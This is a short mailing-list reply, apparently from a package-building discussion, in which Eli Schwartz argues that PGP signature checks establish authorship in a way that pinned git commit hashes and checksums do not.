On 12/08/2016 09:45 AM, Travis Burtrum wrote:
For a #commit=hash you shouldn't have to verify anything, since git itself guarantees that the code under a specific commit hash cannot change.
Everything else can change, including tags, so those are suitable for pgp verification.
Well, that would be just as good as having checksums, which is certainly something. But it is also completely missing the fundamental point of "PGP" verification. ... If users want to assume the maintainer has already checked the PGP signatures for proof of authorship, and simply rely on the checksums being accurate, they can use --skippgpcheck. Personally, I will continue on with checking pgp signatures... I don't see why signed git commits should be different from files with sha256sums in that respect. -- Eli Schwartz